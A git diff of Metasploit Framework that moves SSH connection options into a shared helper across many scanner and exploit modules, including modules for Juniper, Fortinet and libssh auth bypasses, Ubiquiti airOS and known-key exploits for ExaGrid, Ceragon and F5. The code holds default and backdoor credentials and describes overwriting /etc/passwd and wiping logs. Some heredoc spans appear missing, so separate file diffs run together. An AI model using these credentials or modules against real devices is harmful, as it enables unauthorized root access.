diff --git a/lib/metasploit/framework/login_scanner/ssh.rb b/lib/metasploit/framework/login_scanner/ssh.rb index 34984229b6..385b645d94 100644 --- a/lib/metasploit/framework/login_scanner/ssh.rb +++ b/lib/metasploit/framework/login_scanner/ssh.rb @@ -13,7 +13,7 @@ module Metasploit # class SSH include Metasploit::Framework::LoginScanner::Base - + include Msf::Exploit::Remote::SSH # # CONSTANTS # @@ -52,16 +52,10 @@ module Metasploit # @note The caller *must* close {#ssh_socket} def attempt_login(credential) self.ssh_socket = nil - factory = Rex::Socket::SSHFactory.new(framework,framework_module, proxies) - opt_hash = { + opt_hash = ssh_client_defaults.merge({ :port => port, - :use_agent => false, - :config => false, - :verbose => verbosity, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + :verbose => verbosity + }) case credential.private_type when :password, nil opt_hash.update( @@ -88,8 +82,11 @@ module Metasploit end rescue OpenSSL::Cipher::CipherError, ::EOFError, Net::SSH::Disconnect, Rex::ConnectionError, ::Timeout::Error, Errno::ECONNRESET => e result_options.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e) - rescue Net::SSH::Exception - result_options.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: e) + rescue Net::SSH::Exception => e + status = Metasploit::Model::Login::Status::INCORRECT + status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT if e.message.split("\n").first == 'could not settle on kex algorithm' + + result_options.merge!(status: status, proof: e) end unless result_options.has_key? :status diff --git a/lib/msf/core/exploit/remote/ssh.rb b/lib/msf/core/exploit/remote/ssh.rb index c37c07911c..d2a5c59300 100644 --- a/lib/msf/core/exploit/remote/ssh.rb +++ b/lib/msf/core/exploit/remote/ssh.rb @@ -12,7 +12,6 @@ require 'rex/socket/ssh_factory' require 'msf/core/exploit/remote/ssh/auth_methods' module Msf::Exploit::Remote::SSH - # Register SSH datastore options: # SSH_IDENT (TODO: Refactor to SSHIdent) # SSH_TIMEOUT (TODO: Refactor to SSHTimeout) @@ -20,6 +19,10 @@ module Msf::Exploit::Remote::SSH include Msf::Exploit::Remote::SSH::Options def ssh_socket_factory + unless defined? datastore + return Rex::Socket::SSHFactory.new(framework, self, proxies) + end + Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies']) end @@ -33,5 +36,4 @@ module Msf::Exploit::Remote::SSH append_all_supported_algorithms: true } end - end diff --git a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb index e598159cec..b2c37330c8 100644 --- a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb +++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb @@ -63,17 +63,11 @@ class MetasploitModule < Msf::Auxiliary end def do_login(user, pass, ip) - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ :auth_methods => ['password'], :port => rport, - :config => false, - :use_agent => false, :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + }) opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] @@ -111,7 +105,7 @@ class MetasploitModule < Msf::Auxiliary print_status("#{ip}:#{rport} - Attempt to login...") ssh = do_login(username, password, ip) if ssh - output = ssh.exec!("shell:exec #{cmd}\n").to_s + output = ssh.exec!("#{cmd}\n").to_s if output print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") store_loot("apache.karaf.command", diff --git a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb index 8ee8eb8ab2..8ab8ba869d 100644 --- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb @@ -46,21 +46,17 @@ class MetasploitModule < Msf::Auxiliary end def run_host(ip) - factory = ssh_socket_factory # Specified Kex/Encryption downgrade requirements must be set to connect to the Power Meters. - ssh_opts = { + ssh_opts = ssh_client_defaults.merge({ auth_methods: ['publickey'], port: rport, key_data: [ key_data ], hmac: ['hmac-sha1'], encryption: ['aes128-cbc'], kex: ['diffie-hellman-group1-sha1'], - host_key: ['ssh-rsa'], - use_agent: false, - config: false, - proxy: factory - } + host_key: ['ssh-rsa'] + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 2a939dbed7..acfadfd112 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -44,17 +44,12 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) factory = ssh_socket_factory - ssh_opts = { + ssh_opts = ssh_client_defaults.merge({ port: rport, # The auth method is converted into a class name for instantiation, # so fortinet-backdoor here becomes FortinetBackdoor from the mixin - auth_methods: ['fortinet-backdoor'], - non_interactive: true, - config: false, - use_agent: false, - verify_host_key: :never, - proxy: factory - } + auth_methods: ['fortinet-backdoor'] + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb index 5d254df818..5ede213c90 100644 --- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb @@ -41,15 +41,11 @@ class MetasploitModule < Msf::Auxiliary end def run_host(ip) - factory = ssh_socket_factory - ssh_opts = { + ssh_opts = ssh_client_defaults.merge({ :port => rport, :auth_methods => ['password', 'keyboard-interactive'], :password => %q{<<< %s(un='%s') = %u}, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb index 37f5dd07ba..e2f9022ca9 100644 --- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb +++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb @@ -81,19 +81,12 @@ class MetasploitModule < Msf::Auxiliary fail_with(Failure::BadConfig, 'Execute action requires CMD to be set') end - factory = ssh_socket_factory - - ssh_opts = { + ssh_opts = ssh_client_defaults.merge({ port: rport, # The auth method is converted into a class name for instantiation, # so libssh-auth-bypass here becomes LibsshAuthBypass from the mixin - auth_methods: ['libssh-auth-bypass'], - non_interactive: true, - config: false, - use_agent: false, - verify_host_key: :never, - proxy: factory - } + auth_methods: ['libssh-auth-bypass'] + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index fefaad992d..66ba18d0c3 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -137,14 +137,9 @@ class MetasploitModule < Msf::Auxiliary def check_user(ip, user, port) technique = action['Type'] - opts = { - port: port, - use_agent: false, - config: false, - proxy: ssh_socket_factory, - non_interactive: true, - verify_host_key: :never - } + opts = ssh_client_defaults.merge({ + port: port + }) # The auth method is converted into a class name for instantiation, # so malformed-packet here becomes MalformedPacket from the mixin diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index eaaf6ace38..4ab55b0fce 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -11,43 +11,47 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "Apple iOS Default SSH Password Vulnerability", - 'Description' => %q{ - This module exploits the default credentials of Apple iOS when it - has been jailbroken and the passwords for the 'root' and 'mobile' - users have not been changed. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apple iOS Default SSH Password Vulnerability', + 'Description' => %q{ + This module exploits the default credentials of Apple iOS when it + has been jailbroken and the passwords for the 'root' and 'mobile' + users have not been changed. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'hdm' ], - 'References' => - [ + 'References' => [ ['OSVDB', '61284'] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => - [ + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ], ], - 'Privileged' => true, - 'DisclosureDate' => '2007-07-02', - 'DefaultTarget' => 0)) + 'Privileged' => true, + 'DisclosureDate' => '2007-07-02', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + ) + ) register_options( [ @@ -72,26 +76,18 @@ class MetasploitModule < Msf::Exploit::Remote datastore['RHOST'] end - def rport datastore['RPORT'] end - def do_login(user, pass) - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + password: pass + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil @@ -122,17 +118,16 @@ class MetasploitModule < Msf::Exploit::Remote return nil end - def exploit - self.target['accounts'].each do |info| - user,pass = info + target['accounts'].each do |info| + user, pass = info print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'") conn = do_login(user, pass) - if conn - print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})") - handler(conn.lsock) - break - end + next unless conn + + print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})") + handler(conn.lsock) + break end end end diff --git a/modules/exploits/linux/http/alienvault_exec.rb b/modules/exploits/linux/http/alienvault_exec.rb index e6b99bf258..506924223c 100644 --- a/modules/exploits/linux/http/alienvault_exec.rb +++ b/modules/exploits/linux/http/alienvault_exec.rb @@ -295,16 +295,11 @@ class MetasploitModule < Msf::Exploit::Remote end # We will trigger the rogue policy by doing ssh auth attempt with invalid credential :-) - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password'], port: 22, - use_agent: false, - config: false, - password: rand_text_alpha(15), - proxy: factory, - non_interactive: true - } + password: rand_text_alpha(15) + }) print_status("Triggering the policy by performing SSH login attempt") diff --git a/modules/exploits/linux/http/cisco_firepower_useradd.rb b/modules/exploits/linux/http/cisco_firepower_useradd.rb index c06f0903d2..653821ba92 100644 --- a/modules/exploits/linux/http/cisco_firepower_useradd.rb +++ b/modules/exploits/linux/http/cisco_firepower_useradd.rb @@ -74,13 +74,13 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Console is found.") vprint_status("Checking SSH service.") begin + opts = ssh_client_defaults.merge({ + port: datastore['SSHPORT'], + password: Rex::Text.rand_text_alpha(5), + auth_methods: ['password'] + }) ::Timeout.timeout(datastore['SSH_TIMEOUT']) do - Net::SSH.start(rhost, 'admin', - port: datastore['SSHPORT'], - password: Rex::Text.rand_text_alpha(5), - auth_methods: ['password'], - non_interactive: true - ) + Net::SSH.start(rhost, 'admin', opts) end rescue Timeout::Error vprint_error('The SSH connection timed out.') diff --git a/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb b/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb index 2fdebc8488..df867f0fb8 100644 --- a/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb +++ b/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb @@ -18,44 +18,47 @@ class MetasploitModule < Msf::Exploit::Remote moved_from 'exploit/linux/ssh/ubiquiti_airos_file_upload' def initialize(info = {}) - super(update_info(info, - 'Name' => 'Ubiquiti airOS Arbitrary File Upload', - 'Description' => %q{ - This module exploits a pre-auth file upload to install a new root user - to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys. + super( + update_info( + info, + 'Name' => 'Ubiquiti airOS Arbitrary File Upload', + 'Description' => %q{ + This module exploits a pre-auth file upload to install a new root user + to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys. - FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten. - /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true. + FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten. + /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true. - This method is used by the "mf" malware infecting these devices. - }, - 'Author' => [ - '93c08539', # Vulnerability discovery - 'wvu' # Metasploit module - ], - 'References' => [ - %w{EDB 39701}, - %w{URL https://hackerone.com/reports/73480} - ], - 'DisclosureDate' => '2016-02-13', - 'License' => MSF_LICENSE, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Payload' => { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find' + This method is used by the "mf" malware infecting these devices. + }, + 'Author' => [ + '93c08539', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + %w[EDB 39701], + %w[URL https://hackerone.com/reports/73480] + ], + 'DisclosureDate' => '2016-02-13', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Targets' => [ + ['Ubiquiti airOS < 5.6.2', {}] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'SSL' => true } - }, - 'Targets' => [ - ['Ubiquiti airOS < 5.6.2', {}] - ], - 'DefaultTarget' => 0, - 'DefaultOptions' => { - 'SSL' => true - } - )) + ) + ) register_options([ Opt::RPORT(443), @@ -64,9 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote register_advanced_options([ OptBool.new('PERSIST_ETC', [false, 'Persist in /etc/persistent', false]), - OptBool.new('WIPE_LOGS', [false, 'Wipe /var/log/messages', false]), - OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), - OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) + OptBool.new('WIPE_LOGS', [false, 'Wipe /var/log/messages', false]), + OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), + OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) ]) end @@ -103,9 +106,9 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi( 'method' => 'POST', - 'uri' => '/login.cgi', - 'ctype' => "multipart/form-data; boundary=#{mime.bound}", - 'data' => mime.to_s + 'uri' => '/login.cgi', + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'data' => mime.to_s ) end @@ -117,25 +120,18 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi( 'method' => 'POST', - 'uri' => '/login.cgi', - 'ctype' => "multipart/form-data; boundary=#{mime.bound}", - 'data' => mime.to_s + 'uri' => '/login.cgi', + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'data' => mime.to_s ) end def ssh_login - factory = ssh_socket_factory - - ssh_opts = { - port: datastore['SSH_PORT'], - auth_methods: %w{publickey password}, - key_data: [private_key], - non_interactive: true, - config: false, - use_agent: false, - verify_host_key: :never, - proxy: factory - } + ssh_opts = ssh_client_defaults.merge({ + port: datastore['SSH_PORT'], + auth_methods: %w[publickey password], + key_data: [private_key] + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] @@ -151,13 +147,13 @@ class MetasploitModule < Msf::Exploit::Remote if ssh report_vuln( host: rhost, - name: self.name, - refs: self.references, + name: name, + refs: references, info: ssh.transport.server_version.version ) store_valid_credential( - user: username, - private: private_key, + user: username, + private: private_key, private_type: :ssh_key ) return Net::SSH::CommandStream.new(ssh) @@ -169,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote # This is for store_valid_credential above def service_details super.merge( - port: datastore['SSH_PORT'], + port: datastore['SSH_PORT'], service_name: 'ssh' ) end @@ -186,9 +182,9 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi( 'method' => 'POST', - 'uri' => '/login.cgi', - 'ctype' => "multipart/form-data; boundary=#{mime.bound}", - 'data' => mime.to_s + 'uri' => '/login.cgi', + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'data' => mime.to_s ) # http://www.hwmn.org/w/Ubiquity_HOWTO @@ -251,9 +247,9 @@ class MetasploitModule < Msf::Exploit::Remote # def rc_poststart - < 'Ceragon FibeAir IP-10 SSH Private Key Exposure', - 'Description' => %q{ - Ceragon ships a public/private key pair on FibeAir IP-10 devices - that allows passwordless authentication to any other IP-10 device. - Since the key is easily retrievable, an attacker can use it to - gain unauthorized remote access as the "mateidu" user. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => false, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure', + 'Description' => %q{ + Ceragon ships a public/private key pair on FibeAir IP-10 devices + that allows passwordless authentication to any other IP-10 device. + Since the key is easily retrievable, an attacker can use it to + gain unauthorized remote access as the "mateidu" user. }, - }, - 'Author' => [ - 'hdm', # Discovery - 'todb' # Metasploit module and advisory text (mostly copy-paste) - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2015-0936'], - ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure - ], - 'DisclosureDate' => '2015-04-01', # Not a joke - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => [ + 'hdm', # Discovery + 'todb' # Metasploit module and advisory text (mostly copy-paste) + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2015-0936'], + ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure + ], + 'DisclosureDate' => '2015-04-01', # Not a joke + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + } + ) + ) register_options( [ @@ -60,30 +69,24 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end def do_login(user) - factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies']) - opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) + opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @@ -118,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login("mateidu") + conn = do_login('mateidu') if conn print_good "#{rhost}:#{rport} - Successful login" handler(conn.lsock) @@ -126,23 +129,22 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < "Cisco UCS Director default scpuser password", - 'Description' => %q{ - This module abuses a known default password on Cisco UCS Director. The 'scpuser' - has the password of 'scpuser', and allows an attacker to login to the virtual appliance - via SSH. - This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. - Note that Cisco also mentions in their advisory that their IMC Supervisor and - UCS Director Express are also affected by these vulnerabilities, but this module - was not tested with those products. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Cisco UCS Director default scpuser password', + 'Description' => %q{ + This module abuses a known default password on Cisco UCS Director. The 'scpuser' + has the password of 'scpuser', and allows an attacker to login to the virtual appliance + via SSH. + This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. + Note that Cisco also mentions in their advisory that their IMC Supervisor and + UCS Director Express are also affected by these vulnerabilities, but this module + was not tested with those products. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module ], - 'References' => - [ + 'References' => [ [ 'CVE', '2019-1935' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ], [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => - [ + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ [ 'Cisco UCS Director < 6.7.2.0', {} ], ], - 'Privileged' => false, - 'DefaultTarget' => 0, - 'DisclosureDate' => '2019-08-21' - )) + 'Privileged' => false, + 'DefaultTarget' => 0, + 'DisclosureDate' => '2019-08-21', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + ) + ) register_options( [ Opt::RPORT(22), - OptString.new('USERNAME', [true, "Username to login with", 'scpuser']), - OptString.new('PASSWORD', [true, "Password to login with", 'scpuser']), + OptString.new('USERNAME', [true, 'Username to login with', 'scpuser']), + OptString.new('PASSWORD', [true, 'Password to login with', 'scpuser']), ], self.class ) @@ -82,19 +85,13 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(user, pass) - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + password: pass + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index f8d33df275..d4cce50196 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -13,38 +13,46 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH def initialize(info = {}) - super(update_info(info, { - 'Name' => 'ExaGrid Known SSH Key and Default Password', - 'Description' => %q{ - ExaGrid ships a public/private key pair on their backup appliances to - allow passwordless authentication to other ExaGrid appliances. Since - the private key is easily retrievable, an attacker can use it to gain - unauthorized remote access as root. Additionally, this module will - attempt to use the default password for root, 'inflection'. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'ExaGrid Known SSH Key and Default Password', + 'Description' => %q{ + ExaGrid ships a public/private key pair on their backup appliances to + allow passwordless authentication to other ExaGrid appliances. Since + the private key is easily retrievable, an attacker can use it to gain + unauthorized remote access as root. Additionally, this module will + attempt to use the default password for root, 'inflection'. }, - }, - 'Author' => ['egypt'], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2016-1560' ], # password - [ 'CVE', '2016-1561' ], # private key - [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] - ], - 'DisclosureDate' => '2016-04-07', - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => ['egypt'], + 'License' => MSF_LICENSE, + 'References' => [ + [ 'CVE', '2016-1560' ], # password + [ 'CVE', '2016-1561' ], # private key + [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] + ], + 'DisclosureDate' => '2016-04-07', + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + } + ) + ) register_options( [ @@ -60,13 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end @@ -108,25 +116,19 @@ class MetasploitModule < Msf::Exploit::Remote # negatives due to weirdness with ssh sockets. We already know it's a shell # because auth succeeded by this point, so no need to do the check anyway. module TrustMeItsAShell - def _check_shell(*args) + def _check_shell(*_args) true end end def exploit payload_instance.extend(TrustMeItsAShell) - factory = ssh_socket_factory - ssh_options = { - :auth_methods => ['publickey'], - :config => false, - :use_agent => false, - :key_data => [ key_data ], - :port => rport, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + ssh_options = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + key_data: [ key_data ], + port: rport + }) ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] conn = do_login(ssh_options) @@ -140,28 +142,28 @@ class MetasploitModule < Msf::Exploit::Remote end end - def is_success?(conn,key_based) + def success?(conn, key_based) if conn - print_good "Successful login" + print_good 'Successful login' service_data = { address: rhost, port: rport, protocol: 'tcp', service_name: 'ssh', - workspace_id: myworkspace_id, + workspace_id: myworkspace_id } credential_data = { username: 'root', - private_type: ( key_based ? :ssh_key : :password ), - private_data: ( key_based ? key_data : 'inflection' ), + private_type: (key_based ? :ssh_key : :password), + private_data: (key_based ? key_data : 'inflection'), origin_type: :service, - module_fullname: fullname, + module_fullname: fullname }.merge(service_data) core = create_credential(credential_data) login_data = { core: core, - last_attempted: Time.now, + last_attempted: Time.now }.merge(service_data) create_credential_login(login_data) @@ -174,22 +176,22 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < 'F5 BIG-IP SSH Private Key Exposure', - 'Description' => %q( + 'Name' => 'F5 BIG-IP SSH Private Key Exposure', + 'Description' => %q{ F5 ships a public/private key pair on BIG-IP appliances that allows passwordless authentication to any other BIG-IP box. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as root. - ), - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => - { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find' - } - }, - 'Author' => ['egypt'], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ], - [ 'CVE', '2012-1493' ], - [ 'OSVDB', '82780' ], - [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ] - ], + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => ['egypt'], + 'License' => MSF_LICENSE, + 'References' => [ + [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ], + [ 'CVE', '2012-1493' ], + [ 'OSVDB', '82780' ], + [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ] + ], 'DisclosureDate' => '2012-06-11', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -75,18 +79,12 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(user) - factory = Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies']) + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) - 